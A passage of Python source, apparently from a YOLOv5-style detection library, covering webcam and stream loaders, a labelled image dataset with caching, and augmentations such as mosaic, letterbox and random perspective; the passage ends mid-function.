        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right (mirror view)
        else:  # IP camera
            # Grab-and-drop frames so we always decode a recent one.
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, f'Camera Error {self.pipe}'
        img_path = 'webcam.jpg'
        print(f'webcam {self.count}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Iterator over several live streams, each read by its own daemon thread.

    Yields (sources, batch of letterboxed CHW RGB images, list of original BGR
    frames, None); press 'q' in an OpenCV window to stop.
    """

    def __init__(self, sources='streams.txt', img_size=640, stride=32):
        self.mode = 'stream'
        self.img_size = img_size
        self.stride = stride

        # `sources` may be a file listing one stream per line, or one URL.
        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n
        self.sources = [clean_str(x) for x in sources]  # clean source names for later
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print(f'{i + 1}/{n}: {s}... ', end='')
            cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
            assert cap.isOpened(), f'Failed to open {s}'
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(f' success ({w}x{h} at {fps:.2f} FPS).')
            thread.start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0)  # shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame
                success, im = cap.retrieve()
                # On decode failure, blank the frame rather than keeping a stale one.
                self.imgs[index] = im if success else self.imgs[index] * 0
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        img0 = self.imgs.copy()
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB, to bsx3x416x416
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    """
    Map image file paths to their corresponding label file paths.

    The first '/images/' directory component is replaced with '/labels/' and
    the file extension is replaced with '.txt'.

    Fix over the original: the old implementation rsplit the path on its own
    extension string, so a path *without* an extension collapsed to the bare
    string 'txt'; now such a path yields '<path>.txt'. Assumes image paths do
    not contain dots in directory names after the '/images/' swap.

    Parameters
    ----------
    img_paths : iterable of str
        Image file paths containing an '/images/' component.

    Returns
    -------
    list of str
        Label file paths.
    """
    sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep  # /images/, /labels/ substrings
    return [x.replace(sa, sb, 1).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):  # for training/testing
    """
    torch Dataset of images plus YOLO-format labels, with label caching,
    optional in-RAM image caching, rectangular batching, and mosaic/mixup/
    HSV/flip augmentation during training.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride
        self.path = path

        # Gather image file paths: 'path' may be a directory, a listing file, or a list of either.
        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = Path(p)  # os-agnostic
                if p.is_dir():  # dir
                    f += glob.glob(str(p / '**' / '*.*'), recursive=True)
                    # f = list(p.rglob('**/*.*'))  # pathlib
                elif p.is_file():  # file
                    with open(p, 'r') as t:
                        t = t.read().strip().splitlines()
                        parent = str(p.parent) + os.sep
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                        # f += [p.parent / x.lstrip(os.sep) for x in t]  # local to global path (pathlib)
                else:
                    raise Exception(f'{prefix}{p} does not exist')
            self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
            # self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats])  # pathlib
            assert self.img_files, f'{prefix}No images found'
        except Exception as e:
            raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')

        # Check cache
        self.label_files = img2label_paths(self.img_files)  # labels
        # NOTE(review): 'p' is the *last* value left over from the loop above;
        # with a multi-element 'path' list only the final entry decides the
        # cache location — verify this is intended.
        cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')  # cached labels
        if cache_path.is_file():
            cache, exists = torch.load(cache_path), True  # load
            if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache:  # changed
                cache, exists = self.cache_labels(cache_path, prefix), False  # re-cache
        else:
            cache, exists = self.cache_labels(cache_path, prefix), False  # cache

        # Display cache
        nf, nm, ne, nc, n = cache.pop('results')  # found, missing, empty, corrupted, total
        if exists:
            d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
            tqdm(None, desc=prefix + d, total=n, initial=n)  # display cache results
        assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'

        # Read cache
        cache.pop('hash')  # remove hash
        cache.pop('version')  # remove version
        labels, shapes, self.segments = zip(*cache.values())
        self.labels = list(labels)
        self.shapes = np.array(shapes, dtype=np.float64)
        self.img_files = list(cache.keys())  # update
        self.label_files = img2label_paths(cache.keys())  # update
        if single_cls:
            # Collapse every class id to 0 for single-class training.
            for x in self.labels:
                x[:, 0] = 0

        n = len(shapes)  # number of images
        # NOTE(review): np.int is deprecated/removed in modern NumPy; int works.
        bi = np.floor(np.arange(n) / batch_size).astype(np.int)  # batch index
        nb = bi[-1] + 1  # number of batches
        self.batch = bi  # batch index of image
        self.n = n
        self.indices = range(n)

        # Rectangular Training
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes: per batch, the shape that bounds its
            # most extreme aspect ratio (relative to a unit square).
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs = [None] * n
        if cache_images:
            gb = 0  # Gigabytes of cached images
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))  # 8 threads
            pbar = tqdm(enumerate(results), total=n)
            for i, x in pbar:
                self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # img, hw_original, hw_resized = load_image(self, i)
                gb += self.imgs[i].nbytes
                pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'

    def cache_labels(self, path=Path('./labels.cache'), prefix=''):
        """
        Scan and validate every image/label pair, then save a cache dict
        mapping image path -> [labels, shape, segments] (plus 'hash',
        'results', 'version' bookkeeping keys) to *path* and return it.
        """
        # Cache dataset labels, check images and read shapes
        x = {}  # dict
        nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, duplicate
        pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
        for i, (im_file, lb_file) in enumerate(pbar):
            try:
                # verify images
                im = Image.open(im_file)
                im.verify()  # PIL verify
                shape = exif_size(im)  # image size
                segments = []  # instance segments
                assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
                assert im.format.lower() in img_formats, f'invalid image format {im.format}'

                # verify labels
                if os.path.isfile(lb_file):
                    nf += 1  # label found
                    with open(lb_file, 'r') as f:
                        l = [x.split() for x in f.read().strip().splitlines()]
                        if any([len(x) > 8 for x in l]):  # is segment
                            classes = np.array([x[0] for x in l], dtype=np.float32)
                            segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l]  # (cls, xy1...)
                            l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1)  # (cls, xywh)
                        l = np.array(l, dtype=np.float32)
                    if len(l):
                        assert l.shape[1] == 5, 'labels require 5 columns each'
                        assert (l >= 0).all(), 'negative labels'
                        assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
                        assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
                    else:
                        ne += 1  # label empty
                        l = np.zeros((0, 5), dtype=np.float32)
                else:
                    nm += 1  # label missing
                    l = np.zeros((0, 5), dtype=np.float32)
                x[im_file] = [l, shape, segments]
            except Exception as e:
                # Corrupted image or label: skip the file, keep scanning.
                nc += 1
                print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')

            pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
                        f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"

        if nf == 0:
            print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')

        x['hash'] = get_hash(self.label_files + self.img_files)
        x['results'] = nf, nm, ne, nc, i + 1
        x['version'] = 0.1  # cache version
        torch.save(x, path)  # save for next time
        logging.info(f'{prefix}New cache created: {path}')
        return x

    def __len__(self):
        return len(self.img_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self

    def __getitem__(self, index):
        """
        Return (img_tensor, labels_out, img_file, shapes) for one image.
        labels_out is an (nL, 6) tensor [img_idx, cls, x, y, w, h] with
        xywh normalized; column 0 is filled later by collate_fn.
        """
        index = self.indices[index]  # linear, shuffled, or image_weights

        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp['mosaic']
        if mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None

            # MixUp https://arxiv.org/pdf/1710.09412.pdf
            if random.random() < hyp['mixup']:
                img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
                r = np.random.beta(8.0, 8.0)  # mixup ratio, alpha=beta=8.0
                img = (img * r + img2 * (1 - r)).astype(np.uint8)
                labels = np.concatenate((labels, labels2), 0)

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            labels = self.labels[index].copy()
            if labels.size:  # normalized xywh to pixel xyxy format
                labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])

        if self.augment:
            # Augment imagespace
            if not mosaic:
                # mosaic images were already warped inside load_mosaic()
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])

            # Augment colorspace
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Apply cutouts
            # if random.random() < 0.9:
            #     labels = cutout(img, labels)

        nL = len(labels)  # number of labels
        if nL:
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])  # convert xyxy to xywh
            labels[:, [2, 4]] /= img.shape[0]  # normalized height 0-1
            labels[:, [1, 3]] /= img.shape[1]  # normalized width 0-1

        if self.augment:
            # flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]

            # flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]

        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        """Stack images into a batch and concat labels, writing the batch index into label column 0."""
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes

    @staticmethod
    def collate_fn4(batch):
        """
        Quad collate: every 4 samples become one output image — either the
        first image upscaled 2x, or a 2x2 tile of all four (labels offset
        and rescaled accordingly).
        """
        img, label, path, shapes = zip(*batch)  # transposed
        n = len(shapes) // 4
        img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]

        # Per-tile label offsets (in normalized units) and the 0.5 rescale for tiling.
        ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
        wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
        s = torch.tensor([[1, 1, .5, .5, .5, .5]])  # scale
        for i in range(n):  # zidane torch.zeros(16,3,720,1280)  # BCHW
            i *= 4
            if random.random() < 0.5:
                im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
                    0].type(img[i].type())
                l = label[i]
            else:
                im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
                l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
            img4.append(im)
            label4.append(l)

        for i, l in enumerate(label4):
            l[:, 0] = i  # add target image index for build_targets()

        return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
    """
    Load one dataset image (from the RAM cache when available) and return
    (img, (h0, w0), (h, w)) — the BGR image, its original size and its
    resized size, where the long side is scaled to self.img_size.
    """
    cached = self.imgs[index]
    if cached is not None:
        # Cache hit: sizes were recorded when the image was cached.
        return cached, self.img_hw0[index], self.img_hw[index]

    path = self.img_files[index]
    im = cv2.imread(path)  # BGR
    assert im is not None, 'Image Not Found ' + path
    h0, w0 = im.shape[:2]  # original hw
    ratio = self.img_size / max(h0, w0)  # scale long side to img_size
    if ratio != 1:
        # Downscale with INTER_AREA for quality unless augmenting (then always linear).
        interp = cv2.INTER_AREA if ratio < 1 and not self.augment else cv2.INTER_LINEAR
        im = cv2.resize(im, (int(w0 * ratio), int(h0 * ratio)), interpolation=interp)
    return im, (h0, w0), im.shape[:2]
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
    """
    Randomly jitter hue/saturation/value of BGR image *img* in place.

    Each channel is scaled by a random gain in [1-g, 1+g], applied via
    uint8 lookup tables; hue wraps modulo 180 (OpenCV hue range).
    """
    r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1  # random gains
    hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
    dtype = img.dtype  # uint8

    x = np.arange(0, 256, dtype=np.int16)
    lut_hue = ((x * r[0]) % 180).astype(dtype)
    lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
    lut_val = np.clip(x * r[2], 0, 255).astype(dtype)

    img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
    cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # no return needed
def hist_equalize(img, clahe=True, bgr=False):
    # Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
    """
    Equalize the luminance histogram of a 3-channel image.

    Converts to YUV, equalizes the Y channel (CLAHE when clahe=True, global
    histogram equalization otherwise) and converts back. *bgr* selects
    whether the input/output color order is BGR or RGB.
    """
    yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
    if clahe:
        c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
        yuv[:, :, 0] = c.apply(yuv[:, :, 0])
    else:
        yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0])  # equalize Y channel histogram
    return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB)  # convert YUV image to RGB
def load_mosaic(self, index):
    # loads images in a 4-mosaic
    """
    Build a 2s x 2s mosaic from image *index* plus 3 random dataset images,
    placed around a random center, then apply random_perspective cropping
    back to s x s. Returns (img4, labels4) with labels in pixel xyxy.
    """
    labels4, segments4 = [], []
    s = self.img_size
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + random.choices(self.indices, k=3)  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4; 'a' coords index the big canvas, 'b' coords the source tile
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b
        padh = y1a - y1b

        # Labels: shift this tile's labels/segments into canvas coordinates
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
        labels4.append(labels)
        segments4.extend(segments)

    # Concat/clip labels
    labels4 = np.concatenate(labels4, 0)
    for x in (labels4[:, 1:], *segments4):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img4, labels4 = replicate(img4, labels4)  # replicate

    # Augment
    img4, labels4 = random_perspective(img4, labels4, segments4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img4, labels4
def load_mosaic9(self, index):
    # loads images in a 9-mosaic
    """
    Build a 3s x 3s mosaic from image *index* plus 8 random dataset images
    arranged around the center tile, crop a random 2s x 2s window and apply
    random_perspective. Returns (img9, labels9) with labels in pixel xyxy.
    """
    labels9, segments9 = [], []
    s = self.img_size
    indices = [index] + random.choices(self.indices, k=8)  # 8 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img9
        # NOTE(review): hp/wp (previous tile size) are assigned at the end of
        # each iteration, so cases i==2,4,6,8 depend on the fixed placement
        # order of this loop — do not reorder the branches.
        if i == 0:  # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            h0, w0 = h, w
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp

        padx, pady = c[:2]
        x1, y1, x2, y2 = [max(x, 0) for x in c]  # allocate coords

        # Labels: shift this tile's labels/segments into canvas coordinates
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
        labels9.append(labels)
        segments9.extend(segments)

        # Image
        img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous

    # Offset: crop a random 2s x 2s window from the 3s x 3s canvas
    yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border]  # mosaic center x, y
    img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]

    # Concat/clip labels
    labels9 = np.concatenate(labels9, 0)
    labels9[:, [1, 3]] -= xc
    labels9[:, [2, 4]] -= yc
    c = np.array([xc, yc])  # centers
    segments9 = [x - c for x in segments9]

    for x in (labels9[:, 1:], *segments9):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()
    # img9, labels9 = replicate(img9, labels9)  # replicate

    # Augment
    img9, labels9 = random_perspective(img9, labels9, segments9,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img9, labels9
def replicate(img, labels):
    """
    Augment by duplicating the smaller half of the labelled boxes.

    Each selected box's pixels are pasted at a random location inside the
    image (modifying *img* in place) and a matching label row is appended.
    Returns the (mutated) image and the extended label array.
    """
    img_h, img_w = img.shape[:2]
    boxes = labels[:, 1:].astype(int)
    bx1, by1, bx2, by2 = boxes.T
    side = ((bx2 - bx1) + (by2 - by1)) / 2  # mean side length (pixels)

    # Replicate the half of the boxes with the smallest mean side length.
    for i in side.argsort()[:round(side.size * 0.5)]:
        x1b, y1b, x2b, y2b = boxes[i]
        box_h, box_w = y2b - y1b, x2b - x1b
        # Random top-left corner that keeps the pasted patch fully inside the image.
        yc = int(random.uniform(0, img_h - box_h))
        xc = int(random.uniform(0, img_w - box_w))
        x1a, y1a = xc, yc
        x2a, y2a = xc + box_w, yc + box_h
        img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # paste the source patch
        labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)

    return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
    # Resize and pad image while meeting stride-multiple constraints
    """
    Resize *img* to fit *new_shape* preserving aspect ratio, padding the
    borders with *color*. With auto=True the padding is reduced modulo
    *stride* (minimum rectangle); with scaleFill=True the image is stretched
    with no padding. Returns (img, (w_ratio, h_ratio), (dw, dh)) where dw/dh
    are the per-side padding in pixels.
    """
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old)
    r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
    if not scaleup:  # only scale down, do not scale up (for better test mAP)
        r = min(r, 1.0)

    # Compute padding
    ratio = r, r  # width, height ratios
    new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
    dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]  # wh padding
    if auto:  # minimum rectangle
        dw, dh = np.mod(dw, stride), np.mod(dh, stride)  # wh padding
    elif scaleFill:  # stretch
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / shape[1], new_shape[0] / shape[0]  # width, height ratios

    dw /= 2  # divide padding into 2 sides
    dh /= 2

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    # The +/-0.1 rounding splits an odd padding pixel between the two sides.
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
                       border=(0, 0)):
    # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
    # targets = [cls, xyxy]
    """
    Apply a random perspective/affine transform (center, perspective,
    rotation+scale, shear, translation — composed right-to-left) to *img*
    and transform the box/segment targets accordingly. *border* (negative
    values) shrinks the output, undoing a mosaic's doubled canvas. Returns
    (img, surviving_targets).
    """
    height = img.shape[0] + border[0] * 2  # shape(h,w,c)
    width = img.shape[1] + border[1] * 2

    # Center
    C = np.eye(3)
    C[0, 2] = -img.shape[1] / 2  # x translation (pixels)
    C[1, 2] = -img.shape[0] / 2  # y translation (pixels)

    # Perspective
    P = np.eye(3)
    P[2, 0] = random.uniform(-perspective, perspective)  # x perspective (about y)
    P[2, 1] = random.uniform(-perspective, perspective)  # y perspective (about x)

    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    # s = 2 ** random.uniform(-scale, scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)

    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)

    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width  # x translation (pixels)
    T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height  # y translation (pixels)

    # Combined rotation matrix
    M = T @ S @ R @ P @ C  # order of operations (right to left) is IMPORTANT
    if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any():  # image changed
        if perspective:
            img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
        else:  # affine
            img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))

    # Visualize
    # import matplotlib.pyplot as plt
    # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
    # ax[0].imshow(img[:, :, ::-1])  # base
    # ax[1].imshow(img2[:, :, ::-1])  # warped

    # Transform label coordinates
    n = len(targets)
    if n:
        use_segments = any(x.any() for x in segments)
        new = np.zeros((n, 4))
        if use_segments:  # warp segments
            segments = resample_segments(segments)  # upsample
            for i, segment in enumerate(segments):
                xy = np.ones((len(segment), 3))
                xy[:, :2] = segment
                xy = xy @ M.T  # transform
                xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]  # perspective rescale or affine

                # clip
                new[i] = segment2box(xy, width, height)

        else:  # warp boxes
            xy = np.ones((n * 4, 3))
            xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
            xy = xy @ M.T  # transform
            xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8)  # perspective rescale or affine

            # create new boxes: axis-aligned bounds of the 4 warped corners
            x = xy[:, [0, 2, 4, 6]]
            y = xy[:, [1, 3, 5, 7]]
            new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T

            # clip
            new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
            new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)

